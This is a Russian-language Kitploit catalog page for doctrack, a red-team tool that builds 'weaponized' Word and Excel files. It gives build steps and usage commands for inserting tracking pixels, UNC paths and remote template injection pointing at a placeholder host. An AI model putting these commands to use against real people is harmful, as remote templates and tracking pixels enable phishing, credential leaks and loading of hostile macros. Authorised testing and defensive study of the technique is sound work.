Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
doctrack — Инструмент для манипуляции и вооружения документов Office Open XML. | Kitploit
Инструменты/GitHubGitHub/wavvs/doctrack
Инструменты фишингаГенерация полезной нагрузкиСбор информацииRed Teaming
GitHubwavvs/doctrack

doctrack

Инструмент для манипуляции и вооружения документов Office Open XML.

Репозиторий
72183 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Doctrack

Инструмент для манипуляции и вооружения документами Office Open XML.

Возможности

  • Создание документов Office Open XML (Word, Excel)
  • Вставка пикселей отслеживания и UNC-путей
  • Внедрение удаленного шаблона
  • Вставка частей CustomXML
  • Инспекция внешних целевых URL, метаданных и частей Custom XML

Установка

Вам потребуется скачать .Net 6.0. Затем, чтобы собрать единый бинарный файл в Windows:

root@kitploit:~
$ git clone https://github.com/wavvs/doctrack.git
$ cd doctrack/
$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true

В Linux:

root@kitploit:~
$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true

Использование

root@kitploit:~
$ doctrack --help
Tool to manipulate and weaponize Office Open XML documents.

  -i, --input          Input filename. If doesn't exist, new file is created.
  -o, --output         Output filename. If not set, document is saved as --input
                       file.
  -m, --metadata       Metadata to supply (JSON file).
  -u, --url            URL to insert.
  -e, --template       (Default: false) If set, enables template URL injection.
  -s, --inspect        (Default: false) Inspect document.
  -c, --custom-part    Insert a Custom XML part (XML file)
  --help               Display this help screen.

Создать документ Word и изменить метаданные документа:

root@kitploit:~
$ doctrack -i test.docx -m metadata.json

Вставить пиксель отслеживания и изменить метаданные документа:

root@kitploit:~
$ doctrack -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png

Вставить URL удаленного шаблона (также известное как Remote Template Injection):

root@kitploit:~
$ doctrack -i test.docx -o test.docx --url http://test.url/template.dotm --template

Вставить часть Custom XML:

root@kitploit:~
$ doctrack -i test.docx -o test.docx -c part.xml

Инспектировать внешние целевые URL, метаданные и части Custom XML:

root@kitploit:~
$ doctrack -i test.docx --inspect
[External targets]
Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.png
Part: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm

[Metadata]
Creator: wavvs
Title: doctrack
Subject:
Category:
Keywords:
Description:
ContentType:
ContentStatus:
Version:
Revision:
Created: 13.10.2020 23:20:39
Modified: 13.10.2020 23:20:39
LastModifiedBy:
LastPrinted: 13.10.2020 23:20:39
Language:
Identifier:

[CustomXML Parts]
Part: /customXML/item.xml (25 bytes)
Скачать инструмент